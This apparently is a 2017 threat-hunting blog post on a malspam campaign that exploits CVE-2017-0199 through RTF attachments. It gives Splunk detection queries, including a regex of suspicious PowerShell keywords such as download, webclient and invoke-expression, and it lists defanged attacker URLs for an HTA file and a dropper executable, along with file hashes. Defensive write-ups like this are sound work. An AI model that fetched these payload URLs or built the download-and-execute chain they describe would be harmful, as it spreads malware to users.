Sunday, August 27, 2017

Malspam campaign exploiting CVE-2017-0199: a hunting approach

In the last days I have seen a few malspam emails with RTF files attached.

The content of the mails is fake Shipping order with a ZIP attachment, containing the malicious RTF file.  An example of this file is  https://virustotal.com/#/file/cc1cca6b713f6ab0ddb81639b64e52f12a9875ab1e08034d5722826aef4b3164/detection

This malicious RTF files exploits CVE-2017-0199

PowerShell is used by this campaign, hence monitoring suspicious executed PowerShell commands would detect it. I wrote a bit about this approach here.

In this case, monitoring all HTTP/s connections opened by PowerShell would detect it


index=main powershell "tag::eventtype"=network 
| table _time  process DestinationHostname DestinationIp DestinationPort 


Or any PowerShell command with suspicious parameters, like for example with the following Splunk query:

index=main  Powershell  | regex CommandLine="(?i).*-en|-e|-encoded|
hidden|download|webclient|invoke-expression|new-object|base64|
createobject|uploadfile.*" | table _time ParentCommandLine CommandLine 

Coming back to the initial RTF file,  the PowerShell command executed is as follow:



Which basically acts a dropper for hxxps://www.iso9001-certificare.ro/a/Seal_Encrypted.exe. The malicious file is in VT.             

However, the Use Cases mentioned above are generic Use Cases to detect suspicious Powershell commands, and I am interested in detecting this specific CVE-2017-0199 exploitation scenario.

During the attack phase Winword.exe retrieves a malicious HTA file from a remote server via HTTPs. With this in mind, we can create a search in Splunk to detect any ".hta" file stored  as a temporal internet file in the user "AppData" directory and created by Winword.exe

For example, a query like this does the job:


index=main EventDescription="File Created" Image="*Winword*" 
TargetFilename="*AppData*\.hta" | table Image TargetFilename



The file retrieve in this case is hxxps://www.iso9001-certificare.ro/a/12.hta





I have uploaded a copy of the file here https://virustotal.com/#/file/e6bf9b7fbf30e2ba8bc2c6c0ee117f6cbb604b25fb0b4be24a3fb3e062987b3d/community

Another approach is to hunt for any PowerShell command process with Parent Process mshta.exe


index=main  ParentImage="*mshta.exe" CommandLine=*powershell* 
| table _time ParentCommandLine CommandLine 




Indicators:

www.iso9001-certificare.ro
www.iso9001-certificare.ro/a/12.hta
ww.iso9001-certificare.ro/a/Seal_Encrypted.exe
aea9347409f465a5d9665f868c5258c6 - 12.hta
1db41de874e3539762ea7ea3b416de2d - Po-096.doc
ff61db305ab6f924451cdbe51c66ba1e - Po-096.zip
c1e4f507f85420ad116acf521dc241c6 - drgtgrt.exe